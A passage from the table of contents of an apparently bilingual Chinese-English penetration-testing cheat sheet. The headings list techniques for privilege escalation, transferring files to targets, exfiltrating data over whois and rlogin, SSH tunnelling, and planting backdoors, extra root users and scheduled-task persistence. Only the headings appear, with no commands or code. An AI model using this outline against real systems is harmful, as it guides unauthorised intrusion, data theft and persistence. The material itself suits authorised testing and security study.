    21. 21. Python代码执行
    22. 22. Local Enumeration & Privilege Escalation
    23. 23. ImmunityDebugger
      1. 23.1. Get Loaded Modules
      2. 23.2. Finding JMP ESP Address
      3. 23.3. ZIP爆破
      4. 23.4. Setting up Simple HTTP server
      5. 23.5. mysql提权
      6. 23.6. Docker提权
      7. 23.7. 重置root用户密码
    24. 24. 上传文件到目标
      1. 24.1. TFTP
      2. 24.2. FTP
      3. 24.3. CertUtil
      4. 24.4. PHP
      5. 24.5. Python
      6. 24.6. HTTP: Powershell
      7. 24.7. HTTP: VBScript
      8. 24.8. HTTP: Linux
      9. 24.9. Netcat
      10. 24.10. HTTP: Windows “debug.exe” Method
      11. 24.11. HTTP: Windows BitsAdmin
      12. 24.12. Whois Data Exfiltration
      13. 24.13. Cancel 数据泄露
      14. 24.14. rlogin数据泄露
      15. 24.15. 指定范围ping
      16. 24.16. 爆破XOR
      17. 24.17. 生成错误字符
      18. 24.18. .py -> .exe
      19. 24.19. Netcat Portscan
      20. 24.20. 渗透Windows 服务
      21. 24.21. 查找为指定用户显式设置的文件/文件夹权限
      22. 24.22. AlwaysInstallElevated MSI
      23. 24.23. Windows凭证
      24. 24.24. 没带引号的服务路径
      25. 24.25. 服务后门
      26. 24.26. Port Forwarding / SSH Tunneling
        1. 24.26.1. SSH: Local Port Forwarding
        2. 24.26.2. SSH: Dynamic Port Forwarding
        3. 24.26.3. SSH远程端口转发
        4. 24.26.4. 代理隧道
        5. 24.26.5. http隧道
      27. 24.27. Netsh转发
      28. 24.28. RunAs
        1. 24.28.1. powershell
        2. 24.28.2. CMD
        3. 24.28.3. PsExec
        4. 24.28.4. Pth-WinExe
      29. 24.29. 发现隐藏文件
      30. 24.30. 常规的文件搜索操作
    25. 25. 维持访问
      1. 25.1. 注册表配置单元
      2. 25.2. 解密VNC的密码
      3. 25.3. 创建用户并添加到管理员组
      4. 25.4. SSH keys
      5. 25.5. 创建后门
      6. 25.6. 创建另一个root用户
      7. 25.7. OpenSSL Password
      8. 25.8. 计划任务后门